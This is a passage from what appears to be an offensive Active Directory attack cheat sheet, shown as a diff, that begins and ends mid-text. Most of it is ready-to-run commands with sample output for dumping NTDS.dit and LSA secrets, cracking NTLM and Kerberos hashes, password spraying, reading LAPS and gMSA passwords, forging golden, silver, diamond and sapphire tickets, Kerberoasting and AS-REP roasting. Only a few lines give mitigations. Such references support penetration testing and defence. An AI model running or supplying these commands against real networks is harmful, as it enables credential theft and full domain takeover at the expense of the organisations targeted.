\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy + copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy + ``` +* [windows-commands/ntdsutil](https://learn.microsoft.com/fr-fr/troubleshoot/windows-server/identity/use-ntdsutil-manage-ad-files) + ```powershell + ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q + ``` +* [CrackMapExec VSS module](https://wiki.porchetta.industries/smb-protocol/obtaining-credentials/dump-ntds.dit) + ```powershell + cme smb 10.10.0.202 -u username -p password --ntds vss + ``` + + +### Extract hashes from ntds.dit + +then you need to use [secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) to extract the hashes, use the `LOCAL` options to use it on a retrieved ntds.dit + +```java +secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL +``` + +[secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) also works remotely + +```java +./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss -pwd-last-set -user-status +./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1 +``` + +* `-pwd-last-set`: Shows pwdLastSet attribute for each NTDS.DIT account. +* `-user-status`: Display whether or not the user is disabled. + + +### Using Mimikatz sekurlsa + +Dumps credential data in an Active Directory domain when run on a Domain Controller. +:warning: Requires administrator access with debug or Local SYSTEM rights + +```powershell +sekurlsa::krbtgt +lsadump::lsa /inject /name:krbtgt +``` + +### Crack NTLM hashes with hashcat + +Useful when you want to have the clear text password or when you need to make stats about weak passwords. + +Recommended wordlists: +- [Rockyou.txt](https://weakpass.com/wordlist/90) +- [Have I Been Pwned founds](https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM)) +- [Weakpass.com](https://weakpass.com/) +- Read More at [Methodology and Resources/Hash Cracking.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md) + +```powershell +# Basic wordlist +# (-O) will Optimize for 32 characters or less passwords +# (-w 4) will set the workload to "Insane" +$ hashcat64.exe -m 1000 -w 4 -O -a 0 -o pathtopotfile pathtohashes pathtodico -r myrules.rule --opencl-device-types 1,2 + +# Generate a custom mask based on a wordlist +$ git clone https://github.com/iphelix/pack/blob/master/README +$ python2 statsgen.py ../hashcat.potfile -o hashcat.mask +$ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.hcmask +``` + +:warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like : +- [hashmob.net](https://hashmob.net) +- [crackstation.net](https://crackstation.net) +- [hashes.com](https://hashes.com/en/decrypt/hash) + + +### NTDS Reversible Encryption + +`UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED` ([0x00000080](http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm)), if this bit is set, the password for this user stored encrypted in the directory - but in a reversible form. + +The key used to both encrypt and decrypt is the SYSKEY, which is stored in the registry and can be extracted by a domain admin. +This means the hashes can be trivially reversed to the cleartext values, hence the term “reversible encryption”. + +* List users with "Store passwords using reversible encryption" enabled + ```powershell + Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl + ``` + +The password retrieval is already handled by [SecureAuthCorp/secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) and mimikatz, it will be displayed as CLEARTEXT. + + +## User Hunting + +Sometimes you need to find a machine where a specific user is logged in. +You can remotely query every machines on the network to get a list of the users's sessions. + +* CrackMapExec + ```ps1 + cme smb 10.10.10.0/24 -u Administrator -p 'P@ssw0rd' --sessions + SMB 10.10.10.10 445 WIN-8OJFTLMU1IG [+] Enumerated sessions + SMB 10.10.10.10 445 WIN-8OJFTLMU1IG \\10.10.10.10 User:Administrator + ``` +* Impacket Smbclient + ```ps1 + $ impacket-smbclient Administrator@10.10.10.10 + # who + host: \\10.10.10.10, user: Administrator, active: 1, idle: 0 + ``` +* PowerView Invoke-UserHunter + ```ps1 + # Find computers were a Domain Admin OR a specified user has a session + Invoke-UserHunter + Invoke-UserHunter -GroupName "RDPUsers" + Invoke-UserHunter -Stealth + ``` + + +## Password spraying + +Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. + +> The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates. + +Most of the time the best passwords to spray are : + +- `P@ssw0rd01`, `Password123`, `Password1`, `Hello123`, `mimikatz` +- `Welcome1`/`Welcome01` +- $Companyname1 :`$Microsoft1` +- SeasonYear : `Winter2019*`, `Spring2020!`, `Summer2018?`, `Summer2020`, `July2020!` +- Default AD password with simple mutations such as number-1, special character iteration (*,?,!,#) +- Empty Password (Hash:31d6cfe0d16ae931b73c59d7e0c089c0) + + +### Kerberos pre-auth bruteforcing + +Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. + +> Kerberos pre-authentication errors are not logged in Active Directory with a normal **Logon failure event (4625)**, but rather with specific logs to **Kerberos pre-authentication failure (4771)**. + +* Username bruteforce + ```powershell + root@kali:~$ ./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.10 usernames.txt + ``` +* Password bruteforce + ```powershell + root@kali:~$ ./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt username + ``` +* Password spray + ```powershell + root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123 + root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt rockyou.txt + root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log + ``` + +### Spray a pre-generated passwords list + +* Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network. + ```powershell + crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)` + ``` +* Using `DomainPasswordSpray` to spray a password against all users of a domain. + ```powershell + # https://github.com/dafthack/DomainPasswordSpray + Invoke-DomainPasswordSpray -Password Summer2021! + # /!\ be careful with the account lockout ! + Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt + ``` +* Using `SMBAutoBrute`. + ```powershell + Invoke-SMBAutoBrute -UserList "C:\ProgramData\admins.txt" -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5 -ShowVerbose + ``` + +### Spray passwords against the RDP service + +* Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services. + ```powershell + git clone https://github.com/xFreed0m/RDPassSpray + python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP] + ``` +* Using [hydra](https://github.com/vanhauser-thc/thc-hydra) and [ncrack](https://github.com/nmap/ncrack) to target RDP services. + ```powershell + hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10 + ncrack –connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10 + ``` + +### BadPwdCount attribute + +> The number of times the user tried to log on to the account using an incorrect password. A value of 0 indicates that the value is unknown. + +```powershell +$ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users +LDAP 10.0.2.11 389 dc01 Guest badpwdcount: 0 pwdLastSet: +LDAP 10.0.2.11 389 dc01 krbtgt badpwdcount: 0 pwdLastSet: +``` + + +## Password in AD User comment + +```powershell +$ crackmapexec ldap domain.lab -u 'username' -p 'password' -M user-desc +$ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 -M get-desc-users +GET-DESC... 10.0.2.11 389 dc01 [+] Found following users: +GET-DESC... 10.0.2.11 389 dc01 User: Guest description: Built-in account for guest access to the computer/domain +GET-DESC... 10.0.2.11 389 dc01 User: krbtgt description: Key Distribution Center Service Account +``` + +There are 3-4 fields that seem to be common in most AD schemas: `UserPassword`, `UnixUserPassword`, `unicodePwd` and `msSFU30Password`. + +```powershell +enum4linux | grep -i desc + +Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID +``` + +or dump the Active Directory and `grep` the content. + +```powershell +ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/ +``` + + +## Password of Pre-Created Computer Account + +When `Assign this computer account as a pre-Windows 2000 computer` checkmark is checked, the password for the computer account becomes the same as the computer account in lowercase. For instance, the computer account **SERVERDEMO$** would have the password **serverdemo**. + +```ps1 +# Create a machine with default password +# must be run from a domain joined device connected to the domain +djoin /PROVISION /DOMAIN /MACHINE evilpc /SAVEFILE C:\temp\evilpc.txt /DEFPWD /PRINTBLOB /NETBIOS evilpc +``` + +* When you attempt to login using the credential you should have the following error code : `STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT`. +* Then you need to change the password with [rpcchangepwd.py](https://github.com/SecureAuthCorp/impacket/pull/1304) + + +## Reading LAPS Password + +> Use LAPS to automatically manage local administrator passwords on domain joined computers so that passwords are unique on each managed computer, randomly generated, and securely stored in Active Directory infrastructure. + +### Determine if LAPS is installed + +```ps1 +Get-ChildItem 'c:\program files\LAPS\CSE\Admpwd.dll' +Get-FileHash 'c:\program files\LAPS\CSE\Admpwd.dll' +Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll' +``` + +### Extract LAPS password + +> The "ms-mcs-AdmPwd" a "confidential" computer attribute that stores the clear-text LAPS password. Confidential attributes can only be viewed by Domain Admins by default, and unlike other attributes, is not accessible by Authenticated Users + + - From Windows: + + * adsisearcher (native binary on Windows 8+) + ```powershell + ([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=*))").findAll() | ForEach-Object { $_.properties} + ([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=MACHINE$))").findAll() | ForEach-Object { $_.properties} + ``` + + * [PowerView](https://github.com/PowerShellEmpire/PowerTools) + ```powershell + PS > Import-Module .\PowerView.ps1 + PS > Get-DomainComputer COMPUTER -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime + ``` + + * [LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) + ```powershell + $ Get-LAPSComputers + ComputerName Password Expiration + ------------ -------- ---------- + example.domain.local dbZu7;vGaI)Y6w1L 02/21/2021 22:29:18 + + $ Find-LAPSDelegatedGroups + $ Find-AdmPwdExtendedRights + ``` + + * Powershell AdmPwd.PS + ```powershell + foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}} + ``` + + - From Linux: + + * [pyLAPS](https://github.com/p0dalirius/pyLAPS) to **read** and **write** LAPS passwords: + ```bash + # Read the password of all computers + ./pyLAPS.py --action get -u 'Administrator' -d 'LAB.local' -p 'Admin123!' --dc-ip 192.168.2.1 + # Write a random password to a specific computer + ./pyLAPS.py --action set --computer 'PC01$' -u 'Administrator' -d 'LAB.local' -p 'Admin123!' --dc-ip 192.168.2.1 + ``` + + * [CrackMapExec](https://github.com/mpgn/CrackMapExec): + ```bash + crackmapexec smb 10.10.10.10 -u 'user' -H '8846f7eaee8fb117ad06bdd830b7586c' -M laps + ``` + + * [LAPSDumper](https://github.com/n00py/LAPSDumper) + ```bash + python laps.py -u 'user' -p 'password' -d 'domain.local' + python laps.py -u 'user' -p 'e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c' -d 'domain.local' -l 'dc01.domain.local' + ``` + + * ldapsearch + ```bash + ldapsearch -x -h  -D "@" -w  -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd` + ``` + +### Grant LAPS Access +The members of the group **"Account Operator"** can add and modify all the non admin users and groups. Since **LAPS ADM** and **LAPS READ** are considered as non admin groups, it's possible to add an user to them, and read the LAPS admin password + +```ps1 +Add-DomainGroupMember -Identity 'LAPS ADM' -Members 'user1' -Credential $cred -Domain "domain.local" +Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred -Domain "domain.local" +``` + + +## Reading GMSA Password + +> User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically rotated every 30 days to a randomly generated password of 256 bytes. + +### GMSA Attributes in the Active Directory +* `msDS-GroupMSAMembership` (`PrincipalsAllowedToRetrieveManagedPassword`) - stores the security principals that can access the GMSA password. +* `msds-ManagedPassword` - This attribute contains a BLOB with password information for group-managed service accounts. +* `msDS-ManagedPasswordId` - This constructed attribute contains the key identifier for the current managed password data for a group MSA. +* `msDS-ManagedPasswordInterval` - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA. + + +### Extract NT hash from the Active Directory + +* [mpgn/CrackMapExec](https://github.com/mpgn/CrackMapExec) + ```ps1 + # Use --lsa to get GMSA ID + crackmapexec ldap domain.lab -u user -p 'PWD' --gmsa-convert-id 00[...]99 + crackmapexec ldap domain.lab -u user -p 'PWD' --gmsa-decrypt-lsa '_SC_GMSA_{[...]}_.....' + ``` + +* [rvazarkar/GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader) + ```ps1 + GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT + ``` + +* [micahvandeusen/gMSADumper](https://github.com/micahvandeusen/gMSADumper) + ```powershell + python3 gMSADumper.py -u User -p Password1 -d domain.local + ``` + +* Active Directory Powershell + ```ps1 + $gmsa = Get-ADServiceAccount -Identity 'SVC_SERVICE_ACCOUNT' -Properties 'msDS-ManagedPassword' + $blob = $gmsa.'msDS-ManagedPassword' + $mp = ConvertFrom-ADManagedPasswordBlob $blob + $hash1 = ConvertTo-NTHash -Password $mp.SecureCurrentPassword + ``` + +* [kdejoyce/gMSA_Permissions_Collection.ps1](https://gist.github.com/kdejoyce/f0b8f521c426d04740148d72f5ea3f6f#file-gmsa_permissions_collection-ps1) based on Active Directory PowerShell module + + +## Forging Golden GMSA + +> One notable difference between a **Golden Ticket** attack and the **Golden GMSA** attack is that they no way of rotating the KDS root key secret. Therefore, if a KDS root key is compromised, there is no way to protect the gMSAs associated with it. + +:warning: You can't "force reset" a gMSA password, because a gMSA's password never changes. The password is derived from the KDS root key and `ManagedPasswordIntervalInDays`, so every Domain Controller can at any time compute what the password is, what it used to be, and what it will be at any point in the future. + +* Using [GoldenGMSA](https://github.com/Semperis/GoldenGMSA) + ```ps1 + # Enumerate all gMSAs + GoldenGMSA.exe gmsainfo + # Query for a specific gMSA + GoldenGMSA.exe gmsainfo --sid S-1-5-21-1437000690-1664695696-1586295871-1112 + + # Dump all KDS Root Keys + GoldenGMSA.exe kdsinfo + # Dump a specific KDS Root Key + GoldenGMSA.exe kdsinfo --guid 46e5b8b9-ca57-01e6-e8b9-fbb267e4adeb + + # Compute gMSA password + # --sid : SID of the gMSA (required) + # --kdskey : Base64 encoded KDS Root Key + # --pwdid : Base64 of msds-ManagedPasswordID attribute value + GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 # requires privileged access to the domain + GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45UZXyuYB[...]G2/M= # requires LDAP access + GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45U[...]SM0R7djG2/M= --pwdid AQAAA[..]AAA # Offline mode + ``` + +## Kerberos Tickets + +Tickets are used to grant access to network resources. A ticket is a data structure that contains information about the user's identity, the network service or resource being accessed, and the permissions or privileges associated with that resource. Kerberos tickets have a limited lifetime and expire after a set period of time, typically 8 to 12 hours. + +There are two types of tickets in Kerberos: + +* **Ticket Granting Ticket** (TGT): The TGT is obtained by the user during the initial authentication process. It is used to request additional service tickets without requiring the user to re-enter their credentials. The TGT contains the user's identity, a timestamp, and an encryption of the user's secret key. + +* **Service Ticket** (ST): The service ticket is used to access a specific network service or resource. The user presents the service ticket to the service or resource, which then uses the ticket to authenticate the user and grant access to the requested resource. The service ticket contains the user's identity, a timestamp, and an encryption of the service's secret key. + + +### Dump Kerberos Tickets + +* Mimikatz: `sekurlsa::tickets /export` +* Rubeus + ```ps1 + # List available tickets + Rubeus.exe triage + + # Dump one ticket, the output is in Kirbi format + Rubeus.exe dump /luid:0x12d1f7 + ``` + +### Replay Kerberos Tickets + +* Mimikatz: `mimikatz.exe "kerberos::ptc C:\temp\TGT_Administrator@lab.local.ccache"` +* CrackMapExec: `KRB5CCNAME=/tmp/administrator.ccache crackmapexec smb 10.10.10 -u user --use-kcache` + + +### Convert Kerberos Tickets + +In the Kerberos authentication protocol, ccache and kirbi are two types of Kerberos credential caches that are used to store Kerberos tickets. + +* A credential cache, or `"ccache"` is a temporary storage area for Kerberos tickets that are obtained during the authentication process. The ccache contains the user's authentication credentials and is used to access network resources without having to re-enter the user's credentials for each request. + +* The Kerberos Integrated Windows Authentication (KIWA) protocol used by Microsoft Windows systems also makes use of a credential cache called a `"kirbi"` cache. The kirbi cache is similar to the ccache used by standard Kerberos implementations, but with some differences in the way it is structured and managed. + +While both caches serve the same basic purpose of storing Kerberos tickets to enable efficient access to network resources, they differ in format and structure. You can convert them easily using: + +* kekeo: `misc::convert ccache ticket.kirbi` +* impacket: `impacket-ticketConverter SRV01.kirbi SRV01.ccache` + + +### Pass-the-Ticket Golden Tickets + +Forging a TGT require: +* the `krbtgt` NT hash +* since recently, we cannot use a non-existent account name as a result of `CVE-2021-42287` mitigations + +> The way to forge a Golden Ticket is very similar to the Silver Ticket one. The main differences are that, in this case, no service SPN must be specified to ticketer.py, and the krbtgt NT hash must be used. + +#### Using Mimikatz + +```powershell +# Get info - Mimikatz +lsadump::lsa /inject /name:krbtgt +lsadump::lsa /patch +lsadump::trust /patch +lsadump::dcsync /user:krbtgt + +# Forge a Golden ticket - Mimikatz +kerberos::purge +kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt +kerberos::tgt +``` + +#### Using Meterpreter + +```powershell +# Get info - Meterpreter(kiwi) +dcsync_ntlm krbtgt +dcsync krbtgt + +# Forge a Golden ticket - Meterpreter +load kiwi +golden_ticket_create -d -k -s -u -t +golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck +kerberos_ticket_purge +kerberos_ticket_use /root/Downloads/pentestlabuser.tck +kerberos_ticket_list +``` + +#### Using a ticket on Linux + +```powershell +# Convert the ticket kirbi to ccache with kekeo +misc::convert ccache ticket.kirbi + +# Alternatively you can use ticketer from Impacket +./ticketer.py -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da + +ticketer.py -nthash HASHKRBTGT -domain-sid SID_DOMAIN_A -domain DEV Administrator -extra-sid SID_DOMAIN_B_ENTERPRISE_519 +./ticketer.py -nthash e65b41757ea496c2c60e82c05ba8b373 -domain-sid S-1-5-21-354401377-2576014548-1758765946 -domain DEV Administrator -extra-sid S-1-5-21-2992845451-2057077057-2526624608-519 + +export KRB5CCNAME=/home/user/ticket.ccache +cat $KRB5CCNAME + +# NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file +./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 +``` + +If you need to swap ticket between Windows and Linux, you need to convert them with `ticket_converter` or `kekeo`. + +```powershell +root@kali:ticket_converter$ python ticket_converter.py velociraptor.ccache velociraptor.kirbi +Converting ccache => kirbi +root@kali:ticket_converter$ python ticket_converter.py velociraptor.kirbi velociraptor.ccache +Converting kirbi => ccache +``` + + +Mitigations: +* Hard to detect because they are legit TGT tickets +* Mimikatz generate a golden ticket with a life-span of 10 years + + +### Pass-the-Ticket Silver Tickets + +Forging a Service Ticket (ST) require machine account password (key) or NT hash of the service account. + +```powershell +# Create a ticket for the service +mimikatz $ kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE + +# Examples +mimikatz $ /kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt +mimikatz $ kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park + +# Then use the same steps as a Golden ticket +mimikatz $ misc::convert ccache ticket.kirbi + +root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache +root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 +``` + +Interesting services to target with a silver ticket : + +| Service Type | Service Silver Tickets | Attack | +|---------------------------------------------|------------------------|--------| +| WMI | HOST + RPCSS | `wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"` | +| PowerShell Remoting | CIFS + HTTP + (wsman?) | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC` | +| WinRM | HTTP + wsman | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC` | +| Scheduled Tasks | HOST | `schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /IN "SCOM Agent Health Check" /IR "C:/shell.ps1"` | +| Windows File Share (CIFS) | CIFS | `dir \\dc01\c$` | +| LDAP operations including Mimikatz DCSync | LDAP | `lsadump::dcsync /dc:dc01 /domain:domain.local /user:krbtgt` | +| Windows Remote Server Administration Tools | RPCSS + LDAP + CIFS | / | + + +Mitigations: +* Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket. + + +### Pass-the-Ticket Diamond Tickets + +> Request a legit low-priv TGT and recalculate only the PAC field providing the krbtgt encryption key + +Require: +* krbtgt NT Hash +* krbtgt AES key + +```ps1 +ticketer.py -request -domain 'lab.local' -user 'domain_user' -password 'password' -nthash 'krbtgt/service NT hash' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' -user-id '1337' -groups '512,513,518,519,520' 'baduser' + +Rubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTROLLER /enctype:AES256 /krbkey:HASH /ticketuser:USERNAME /ticketuserid:USER_ID /groups:GROUP_IDS +``` + + +### Pass-the-Ticket Sapphire Tickets + +> Requesting the target user's PAC with `S4U2self+U2U` exchange during TGS-REQ(P) (PKINIT). + +The goal is to mimic the PAC field as close as possible to a legitimate one. + +Require: +* [Impacket PR#1411](https://github.com/SecureAuthCorp/impacket/pull/1411) +* krbtgt AES key + +```ps1 +# baduser argument will be ignored +ticketer.py -request -impersonate 'domain_adm' -domain 'lab.local' -user 'domain_user' -password 'password' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' 'baduser' +``` + + +## Kerberoasting + +> "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names) + +Any valid domain user can request a kerberos ticket (ST) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as. + + +* [GetUserSPNs](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py) from Impacket Suite + ```powershell + $ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request + + Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies + + ServicePrincipalName Name MemberOf PasswordLastSet LastLogon + -------------------- ------------- -------------------------------------------------------- ------------------- ------------------- + active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40 2018-12-03 17:11:11 + + $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43[...]84fd2 + ``` + +* CrackMapExec Module + ```powershell + $ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --kerberoast output.txt + LDAP 10.0.2.11 389 dc01 [*] Windows 10.0 Build 17763 x64 (name:dc01) (domain:lab.local) (signing:True) (SMBv1:False) + LDAP 10.0.2.11 389 dc01 $krb5tgs$23$*john.doe$lab.local$MSSQLSvc/dc01.lab.local~1433*$efea32[...]49a5e82$b28fc61[...]f800f6dcd259ea1fca8f9 + ``` + +* [Rubeus](https://github.com/GhostPack/Rubeus) + ```powershell + # Stats + Rubeus.exe kerberoast /stats + ------------------------------------- ---------------------------------- + | Supported Encryption Type | Count | | Password Last Set Year | Count | + ------------------------------------- ---------------------------------- + | RC4_HMAC_DEFAULT | 1 | | 2021 | 1 | + ------------------------------------- ---------------------------------- + + # Kerberoast (RC4 ticket) + Rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt + + # Kerberoast (AES ticket) + # Accounts with AES enabled in msDS-SupportedEncryptionTypes will have RC4 tickets requested. + Rubeus.exe kerberoast /tgtdeleg + + # Kerberoast (RC4 ticket) + # The tgtdeleg trick is used, and accounts without AES enabled are enumerated and roasted. + Rubeus.exe kerberoast /rc4opsec + ``` + +* [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) + ```powershell + Request-SPNTicket -SPN "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local" + ``` + +* [bifrost](https://github.com/its-a-feature/bifrost) on **macOS** machine + ```powershell + ./bifrost -action asktgs -ticket doIF<...snip...>QUw= -service host/dc1-lab.lab.local -kerberoast true + ``` + +* [targetedKerberoast](https://github.com/ShutdownRepo/targetedKerberoast) + ```powershell + # for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute), + # print the "kerberoast" hash, and delete the temporary SPN set for that operation + targetedKerberoast.py [-h] [-v] [-q] [-D TARGET_DOMAIN] [-U USERS_FILE] [--request-user username] [-o OUTPUT_FILE] [--use-ldaps] [--only-abuse] [--no-abuse] [--dc-ip ip address] [-d DOMAIN] [-u USER] [-k] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] + ``` + + +Then crack the ticket using the correct hashcat mode (`$krb5tgs$23`= `etype 23`) + +| Mode | Description | +|---------|--------------| +| `13100` | Kerberos 5 TGS-REP etype 23 (RC4) | +| `19600` | Kerberos 5 TGS-REP etype 17 (AES128-CTS-HMAC-SHA1-96) | +| `19700` | Kerberos 5 TGS-REP etype 18 (AES256-CTS-HMAC-SHA1-96) | + +```powershell +./hashcat -m 13100 -a 0 kerberos_hashes.txt crackstation.txt +./john --wordlist=/opt/wordlists/rockyou.txt --fork=4 --format=krb5tgs ~/kerberos_hashes.txt +``` + + +Mitigations: +* Have a very long password for your accounts with SPNs (> 32 characters) +* Make sure no users have SPNs + +## KRB_AS_REP Roasting + +> If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting + +**Requirements**: +- Accounts with the attribute **DONT_REQ_PREAUTH** (`PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose`) + +* [Rubeus](https://github.com/GhostPack/Rubeus) + ```powershell + C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast + [*] Action: AS-REP roasting + [*] Target User : TestOU3user + [*] Target Domain : testlab.local + [*] SamAccountName : TestOU3user + [*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local + [*] Using domain controller: testlab.local (192.168.52.100) + [*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user' + [*] Connecting to 192.168.52.100:88 + [*] Sent 169 bytes + [*] Received 1437 bytes + [+] AS-REQ w/o preauth successful! + [*] AS-REP hash: + + $krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)... + ``` + +* [GetNPUsers](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py) from Impacket Suite + ```powershell + $ python GetNPUsers.py htb.local/svc-alfresco -no-pass + [*] Getting TGT for svc-alfresco + $krb5asrep$23$svc-alfresco@HTB.LOCAL:c13528009a59be0a634bb9b8e84c88ee$cb8e87d02bd0ac7a[...]e776b4 + + # extract hashes + root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast + root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast + ``` + +* CrackMapExec Module + ```powershell + $ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --asreproast output.txt + LDAP 10.0.2.11 389 dc01 